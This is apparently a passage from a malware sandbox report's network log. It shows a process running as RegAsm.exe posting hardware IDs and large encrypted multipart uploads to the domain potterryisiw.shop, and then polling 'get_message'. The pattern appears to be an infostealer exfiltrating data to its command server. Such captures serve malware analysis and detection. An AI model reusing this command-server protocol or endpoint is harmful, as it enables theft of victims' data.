      2024-07-01 07:23:55 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:55 UTC5242OUTData Raw: b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
      2024-07-01 07:23:56 UTC | 800 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:56 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=nuib3b3nuss1tgi2licd5e4egn; expires=Fri, 25-Oct-2024 01:10:34 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QOPuhmm7KYpYZUGenBD%2FKU2fpjO0znh21qHjoBJuosYK14R8TOIooxawmw1odCtzGeMhqmTANaZTtCiAHNTo9Ya7zbWmkq0E9SvFjNQH5KUDhUN6uAxQOBTFJtE9e6nMi1bPrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a747abf6431b-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:56 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      5 | 192.168.2.5 | 49714 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:23:56 UTC | 282 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 3806
      Host: potterryisiw.shop
      2024-07-01 07:23:56 UTC3806OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:57 UTC | 806 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:57 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=7p5kbo9fmj0gko3phh16n8abne; expires=Fri, 25-Oct-2024 01:10:36 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kk7cyAKVHQwmI%2FEeaQcbkO97FVxsyZ3VK%2FfgeO5DhhLxGSuP%2F%2FRwkZOTu6s84S7wdAUKsiH0AdYu179JxwoE7GuRTI00uiV7632om5YYAEnR2JGbn3c2M3oZ6pomOgikx2ssHw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a7506b3a7c90-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:57 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      6 | 192.168.2.5 | 49716 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:23:57 UTC | 282 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 1299
      Host: potterryisiw.shop
      2024-07-01 07:23:57 UTC1299OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:58 UTC | 812 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:58 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=226h9epvd9uc462dpfgga41b1t; expires=Fri, 25-Oct-2024 01:10:37 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zd7sEjK7jxrAJ2Doy6KhbWPCJtQweU1iApgc%2BJd%2BrnsEW%2BF9wzMTlOyOhWwc3CbvXC4NdL4j%2BJVHzlA68pUM4Buwi5Ns2KTI8X3saJbOGDaxrLCVmDzQUq%2B%2F3qf6IMzEmOwO%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a755d82d42fe-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:58 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      7 | 192.168.2.5 | 49719 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:23:59 UTC | 284 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 546185
      Host: potterryisiw.shop
      2024-07-01 07:23:59 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:59 UTC15331OUTData Raw: 88 11 48 fc ac 93 ce 31 9b c6 a4 00 df 66 15 48 91 8e ee e5 1b 44 b5 52 ac ff 04 e9 ca 15 fd f3 62 4f a9 f7 b5 c9 2d 85 70 a4 2a 7f d2 51 75 2b 3b 46 23 ea 42 04 3c 46 9c 37 98 65 51 e2 4f 99 c2 e6 91 41 de 94 6e 03 6d 8e ca 0c 5a 80 79 d6 8e 5b 87 cb 63 56 f6 e1 4f b4 12 50 93 ef c3 10 19 98 95 c2 65 24 e0 b7 fe 4d f8 79 fc ad 09 51 56 f1 ef 09 a6 53 95 7e 0d e9 6a 30 10 2c 77 37 e0 c5 46 da 8d 80 24 77 a0 f4 78 05 6f ad b1 ea 76 ee 6b 83 de 43 3f 6b 5c 09 38 a4 30 17 7e 03 0d 43 32 53 2d 15 43 04 ab 51 0d 5f 64 e7 52 53 32 01 a7 ec b8 cc f7 16 56 bd dc ff 9b e0 bf 07 b4 91 8a d3 24 40 80 a1 bd a0 53 1e e0 09 8e 09 68 b7 46 fd 99 e2 ce 75 7b 1f 21 50 7f 3a 12 7c ad e1 af e7 0f 54 57 76 8a b0 83 4e fe c3 0c 7c 2e 55 fc 52 71 9b c4 e7 73 1c 67 05 64 77 5d
      Data Ascii: H1fHDRbO-p*Qu+;F#B<F7eQOAnmZy[cVOPe$MyQVS~j0,w7F$wxovkC?k\80~C2S-CQ_dRS2V$@ShFu{!P:|TWvN|.URqsgdw]
      2024-07-01 07:23:59 UTC15331OUTData Raw: 88 e9 2a cd 58 8d 71 9d 49 0d 33 69 c6 d4 95 1c 0d 5b 44 cd 46 e2 4f 8f 7d db 5c f8 5e 2b a5 50 12 50 a0 7b dc e8 17 89 91 d5 76 26 ec 93 6f 7a c4 8c c1 62 26 74 48 27 3e 34 1c 65 10 75 18 f6 3d 43 64 61 10 1e ae 0d 73 25 c1 d6 d1 ac 4f 55 49 32 c7 3c ab 9a 09 6d 45 8c 1a e3 a3 41 07 60 45 af 8d 1f ca 86 18 27 31 ba 7d ed 34 01 10 c7 a3 c6 b5 ea a4 1d eb 42 dd 5c ad 95 ee 90 7a f6 17 29 9c 51 df a1 88 b9 53 ac df 1c ae 0f d3 eb ee 14 ca d6 55 72 0f 05 6a ec 35 3e 9e f0 04 a6 87 14 95 02 21 75 27 71 46 f2 72 83 b4 43 33 66 64 aa aa 7c 4d 3f dc 0b f5 36 88 db 14 9f dd 23 8f c5 60 86 15 35 69 ca 6b 8a e9 d5 11 41 9d c7 0d 32 a9 da 4c 67 fc aa c1 57 d6 9c 26 6b fc 1a 45 eb 3c fe 29 b5 15 7d 14 20 24 f6 cd 24 13 c4 e7 35 d7 df 09 78 ed 56 15 43 5c 94 77 37 31
      Data Ascii: *XqI3i[DFO}\^+PP{v&ozb&tH'>4eu=Cdas%OUI2<mEA`E'1}4B\z)QSUrj5>!u'qFrC3fd|M?6#`5ikA2LgW&kE<)} $$5xVC\w71
      2024-07-01 07:23:59 UTC15331OUTData Raw: 03 20 c9 96 04 0a 4b 97 d2 4a 1f a4 bb ff 20 43 99 d1 70 1d 2f 68 d1 1e 4b 3d fe 50 63 1f 2f 06 74 ec 09 c9 26 40 7b c0 d9 b6 69 04 14 63 cd 02 6d 74 f1 b1 29 73 5b 86 1e 68 65 b3 e1 2a 81 46 d1 b4 cd bd d7 e9 36 45 31 f5 61 2e 47 89 07 74 77 b4 3e 82 3f 01 a2 2b f4 52 80 71 2e a8 2d e6 51 70 e1 52 e4 6e 39 ff 84 ef f4 32 80 99 b3 40 72 be 80 93 24 ee 8a 6e a1 0e 5b 48 cc 08 f9 c0 13 16 93 fe 79 4b 8f c5 26 a6 bd 53 8c 55 d6 6f 5e 76 09 e9 14 89 70 2b 11 9d ec fa b6 05 e0 4a 6b f9 1a 5f ae 09 0f 03 11 98 f0 b5 ed a3 68 dc bc 20 cf b5 c8 42 61 b9 ac 47 d1 6e 41 f8 96 86 4b de 4e e5 2c a2 1f da 1f 05 4a e7 d0 9d c3 2b 8e 4f 06 87 c3 50 a4 f4 1d 62 ef b6 34 9b 36 bf d9 c3 77 70 ee 36 c6 8a 62 e4 16 23 1d c9 d9 52 4f 7a d9 fe 72 0f 0e ca eb e8 cf 1d 4e f2 64
      Data Ascii: KJ Cp/hK=Pc/t&@{icmt)s[he*F6E1a.Gtw>?+Rq.-QpRn92@r$n[HyK&SUo^vp+Jk_h BaGnAKN,J+OPb46wp6b#ROzrNd
      2024-07-01 07:23:59 UTC15331OUTData Raw: dc a0 77 5b fe 54 8f e2 27 bf 45 1d b1 b3 ed 3f 92 50 41 96 6e 5c 26 78 2e 08 e3 fe 2d 71 cf f2 e6 c0 b1 8d 19 d2 44 f4 c5 fb 95 c0 30 e2 c7 4b ff 21 ac ee 99 d2 a7 dc fb 0a 13 40 81 c6 0d 6b d3 6b d8 ad db 5c 1c f7 8e 6e bf df f4 52 65 78 e5 02 86 25 ba 46 0c 48 1d e7 95 56 0d 51 38 20 29 a0 7c 97 a7 b3 ff 23 36 d4 46 92 af ab f3 e1 2d 0c 5c 7a f5 46 d9 39 85 2e eb a7 1c b1 e5 bb 73 be 7e 2f 08 50 c4 c2 f2 02 d8 19 11 50 66 d5 52 c4 b8 e1 cf ff bf 94 52 07 e1 81 8d fe 58 f8 2f 28 b0 14 0d 67 98 3b cb d2 07 e9 39 54 91 19 08 23 c0 7f fe ea 09 55 97 9a f3 0f bf 69 7c b8 71 83 cf 9b d2 87 c6 08 82 15 ea c2 05 15 3f 36 b4 80 18 fc 84 15 45 7c 9e 63 d9 97 38 86 05 94 69 12 26 8c aa ff 4d c7 50 31 e1 98 b0 a2 67 fc 92 ab 09 15 ec 12 cc 11 07 aa 0e ce d2 0e 6e
      Data Ascii: w[T'E?PAn\&x.-qD0K!@kk\nRex%FHVQ8 )|#6F-\zF9.s~/PPfRRX/(g;9T#Ui|q?6E|c8i&MP1gn
      2024-07-01 07:23:59 UTC15331OUTData Raw: 16 ef 76 ee f1 ba ff 01 9d 85 2b 4f 2f de f7 a7 5f 4f 45 6a 1b 7d dd 08 0e 34 f4 1f 8e 1b 42 1c e3 90 e9 43 f6 db 0d b7 5e 1c 4f 30 00 bb e6 e2 f4 15 72 17 67 3e 9a 31 11 61 ff 69 15 42 4f 7b 90 25 97 cf 75 ca ba b2 4a 0f 6c c6 1e b3 83 fd f8 32 d9 26 71 e2 08 09 eb 79 0c 63 22 53 d7 4d e9 a6 0d b2 f9 a7 32 2d 88 59 f5 11 93 7c ac f6 83 6b 39 80 d0 6a d1 4e 15 a0 f4 df 2a d8 c0 f2 e2 64 6a d2 6a 75 fd 50 37 c3 88 19 17 78 8c c6 45 9f 4a 9b 81 94 4a b4 95 28 05 dc 3b b5 08 34 03 e9 a6 14 33 c6 f6 74 b3 83 f8 c6 cd 90 9a c6 5b 4e 82 07 d7 23 4e c9 8c 66 1d c2 a0 c0 91 37 aa 2b e5 2f df d6 da 1e 32 0a c4 ed 33 2d 37 b5 34 35 cd 32 22 29 09 64 b9 24 b9 db 12 8d 5a 63 02 96 e3 bf 66 78 67 b6 94 a1 27 9f 1c 10 51 bf f7 f9 76 9d 14 2d e2 1f 7e 14 a9 ba 21 58 f2
      Data Ascii: v+O/_OEj}4BC^O0rg>1aiBO{%uJl2&qyc"SM2-Y|k9jN*djjuP7xEJJ(;43t[N#Nf7+/23-7452")d$Zcfxg'Qv-~!X
      2024-07-01 07:23:59 UTC15331OUTData Raw: a4 ce 30 38 9d 8a ed d9 bf 2f cf 4b 3f 9b 7a c6 9d 77 3a d5 64 70 e6 24 d1 94 68 1e 53 38 c1 88 81 03 b9 13 38 72 e0 f3 e8 ff c4 48 2d 44 eb 95 a1 39 9f db 99 f2 5c 1b fd 53 0f b5 01 61 de 61 a0 29 91 ae 67 e1 a7 8b 37 d1 7e b0 59 f8 6a 51 1e 8d 7d 2c c6 b4 88 1c 5a 0b 11 f2 0b de 7d af 8b c3 b8 5b 17 e8 7b 06 9c cd 28 ce 86 a0 9a 9f d4 b0 9f 37 e6 f8 a5 3a 25 ff a7 a9 fa 7f 85 39 07 f5 81 1b d7 86 e0 6f 21 1b 41 66 3c b0 39 54 20 ee f0 e0 4b c6 17 ba 9c 12 8d 77 e3 e2 31 aa 1a 50 85 85 70 47 e4 ed 11 c5 fd ba b9 7f 1d 29 7d eb a4 eb 07 eb 94 6c 36 c5 81 da e9 cf 29 2f 1e 91 4c 0d 90 54 2f fe bd bf 95 36 22 7f 60 3b 8d f2 ae 39 26 7b 52 c3 c8 70 6d 3d d8 e7 be a6 32 ea ad ed b7 2b 09 67 71 18 6b ae 3b 85 32 cd 29 fb 28 21 45 2e 9f 82 a5 24 df 38 24 9c 71
      Data Ascii: 08/K?zw:dp$hS88rH-D9\Saa)g7~YjQ},Z}[{(7:%9o!Af<9T Kw1PpG)}l6)/LT/6"`;9&{Rpm=2+gqk;2)(!E.$8$q
      2024-07-01 07:23:59 UTC15331OUTData Raw: ba 8c 62 83 bd 05 cd bd 24 5a 6b bd d4 90 a1 17 5b c3 83 89 fa 44 82 da 2c 1e f3 51 73 db 8b af 20 0d 6a fe 17 8b 8c e8 17 71 5c cb cc 15 28 74 a0 1d a6 e9 60 9b f5 b1 77 94 b9 60 eb be 7b 56 2b 5c ee 96 13 da f8 9f b7 6e 14 4e a8 9c f9 79 23 af 88 45 c7 25 8d 77 08 89 a7 c6 66 73 cc a1 0c c7 d7 26 76 5c df 9c 73 68 ac f1 75 15 5b 29 32 66 c4 e9 da f6 79 4c f2 93 90 d8 19 ab a1 88 5b d8 db 73 33 35 c1 37 a8 35 15 91 fa 8c 32 f5 9c 50 f5 d2 0d b6 44 37 f9 b3 64 9e 59 65 d3 93 85 15 c3 6e df 0f b3 6c 79 d7 84 b6 43 1d 48 09 5e c2 d9 80 cc c6 68 35 9a 52 c3 8f 3e ea 1c b2 08 26 ba ba df 30 ae 8c 7d 5f 26 e2 f6 78 06 17 20 d3 20 3c fd d7 35 c2 6d a3 36 e3 85 3b e6 4c ce f0 d7 0e 23 9f be 7f e5 74 b6 32 18 fe 7b b0 bf 8e 4f 70 da 67 b4 7b 56 fe fe c6 f6 ff 76
      Data Ascii: b$Zk[D,Qs jq\(t`w`{V+\nNy#E%wfs&v\shu[)2fyL[s35752PD7dYenlyCH^h5R>&0}_&x <5m6;L#t2{Opg{Vv
      2024-07-01 07:23:59 UTC15331OUTData Raw: ef 7b af 73 c9 a7 6a 0a ed 29 aa 9b 74 43 42 9d 91 34 fa 02 dd 7d 20 dc 82 1f 0c 4e ad 6f ce 4f 25 25 f8 35 fd f2 9b 89 85 51 9f a4 f4 68 9f e3 03 0f 55 81 6e af 06 39 93 9a 5f d6 7d e4 9c 0d ad e7 77 0b 11 22 d9 d0 ba 61 54 25 29 20 b8 d5 52 b3 17 90 7f 98 d1 1e 71 b1 af 34 4c 50 04 1c 18 f4 44 c1 e1 b8 dc 60 4e 9a 0c f8 88 2f e8 3a 47 bd 5d 9c a3 f1 b2 f6 d9 ee e3 71 55 5f ff 29 86 21 7a 62 82 c2 93 a5 73 8a e0 23 fc 0d 6d 52 c7 8f e3 5b b0 95 7b a3 c3 6d ab 2e 44 46 d8 79 ee a8 16 29 21 a0 81 82 e6 f4 1d a9 a9 02 96 93 ee 10 49 33 89 9b 1a 03 8a 2c 3b 17 49 85 04 d3 b7 2f 9b ed 67 3d d0 67 df e1 01 45 ba 8b e2 2b 11 33 ea e2 02 a7 c7 68 a5 37 ef 92 82 5f f1 bf 42 21 67 9c c2 4a d1 83 2f ff 2d bd 71 e7 e1 69 13 c3 5d 40 fb 26 74 5d c4 0e 22 91 91 8a e9
      Data Ascii: {sj)tCB4} NoO%%5QhUn9_}w"aT%) Rq4LPD`N/:G]qU_)!zbs#mR[{m.DFy)!I3,;I/g=gE+3h7_B!gJ/-qi]@&t]"
      2024-07-01 07:23:59 UTC15331OUTData Raw: cd 10 c2 4e b1 13 fc 18 a1 2d 65 31 ac 0a 3e 82 28 f1 17 bc a7 f5 56 8f 1c 2b 3d e5 76 fb 1d 9d 15 aa bf 4f 09 3a dc 6f 3d 6c e0 fb d0 9c 80 4e c0 84 a8 4f ab 7b ba 6f 91 f1 66 72 0a 23 fe c6 9e 05 6b 46 68 7f 99 03 77 63 f1 b7 c5 4a 06 ac 0c 17 c6 a0 e3 83 f5 3e 79 88 7f 5a ba 97 36 d4 f8 39 38 ea 6c 62 5a d8 f6 e2 22 9c aa e9 8e 42 67 c2 08 30 9a ff 9b 59 b7 98 b7 6d 51 46 1e c3 65 5c 65 c6 92 e6 c6 61 9f ae 23 80 d0 c2 79 71 bc 0c 85 25 2e 13 91 72 07 45 7a a4 2d 8f 73 1c b2 f0 be 03 4a f7 3b 44 a4 5c 4f 0c 77 74 09 77 7b 59 04 b5 0b e0 80 b6 01 61 10 22 69 1e e2 75 94 c7 86 b9 5b 9f 7f be 79 fb 9c 19 16 13 9c df b9 7a de ff 7e 78 dd d5 1e f3 b3 a5 bd e2 4f f2 9c 44 2f f7 70 e3 3d c1 bd 96 b3 c5 7b 7d a4 14 e4 72 1f 8d 38 9e 2c 95 3f 43 32 50 2a 80 7d
      Data Ascii: N-e1>(V+=vO:o=lNO{ofr#kFhwcJ>yZ698lbZ"Bg0YmQFe\ea#yq%.rEz-sJ;D\Owtw{Ya"iu[yz~xOD/p={}r8,?C2P*}
      2024-07-01 07:24:00 UTC | 806 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:24:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=flfblkdrn29sm1i7afhhobrohv; expires=Fri, 25-Oct-2024 01:10:39 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TYbH4WhZWO%2FFjKk3i61M8qYBiGeVlGlEsITo30bkBaf5thmjWWTu9sRaLzBdnrIG9hxj03%2F3jnDNbrrose3QZnttXZJUAfjra%2FB9R2Ys1kz3G%2FG6hKmyWoiNMnUKbNDuJCe3A%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a75fb8a50f79-EWR
      alt-svc: h3=":443"; ma=86400


      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      8 | 192.168.2.5 | 49720 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:24:01 UTC | 265 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 88
      Host: potterryisiw.shop
      2024-07-01 07:24:01 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d 26 68 77 69 64 3d 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33
      Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--default2806&j=&hwid=C47BA87E7FEA4409D64FF88069D88493
      2024-07-01 07:24:01 UTC | 804 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:24:01 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=336n36mcqla5aah90tdb5kp0ic; expires=Fri, 25-Oct-2024 01:10:40 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
